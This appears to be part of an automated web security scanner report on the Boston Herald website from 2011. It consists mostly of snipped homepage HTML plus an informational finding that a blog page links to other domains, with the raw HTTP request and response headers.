...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/"><img src="http://cache.heraldinteractive.com/blogs/entertainment/disney_days/wp-content/uploads/2011/01/castaway11111.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-brandon-meriweather-and-darrelle-revis-launch-friendly-fire/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/2010112120101121395900.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/35.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1312261&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/39b0d8_garden_01272011.jpg" border="0"
width="207" height="181" caption="Forever young" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" alt="Charlie Sheen." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312550&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg" border="0"
width="207" height="181" caption="Moore&rsquo;s the merrier at Hasty festivities" />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.264. http://www.bostonherald.com/blogs/sports/rap_sheet/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /blogs/sports/rap_sheet/?srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:48:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 115370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/sports.css" media="screen,projection" />

   
   <link rel="stylesheet" type="text/css" href="/CSS/blogsInside.css" media="screen,projection" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/patriots.css" media="screen,projection" />
   
<script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/sports/football/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="90px" width:"200px" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
News &amp; Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
</strong>. <a href="http://bcove.me/6oguf24t"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=767806748001&#038;playerID=84359688001&#038;playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&#038;domain=embed&#038;dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>is more than a football player. He&#8217;s a celebrity, too, selling <a href="http://www.google.com/url?sa=t&amp;source=web&amp;cd=1&amp;ved=0CBMQFjAA&amp;url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2010%2F11%2F30%2Fpatriots-qb-tom-brady-now-endorsing-the-boots-my-wife-wears%2F&amp;rct=j&amp;q=Rap%20Sheet%20BRady%20Uggs&amp;ei=NANDTY_ZOcOB8gaSlu24AQ&amp;usg=AFQjCNFw3KIS_t1eB_Vew-79zoo6yD1CBg&amp;sig2=WBrzzR3H0XX0Q3gXTwFkzQ&amp;cad=rja">everything from the same shoes</a>
...[SNIP]...
<strong><a href="http://www.imageyenation.com/images/blog-gallery/kylie_ugg_boots.jpg">The Banktress</a>
...[SNIP]...
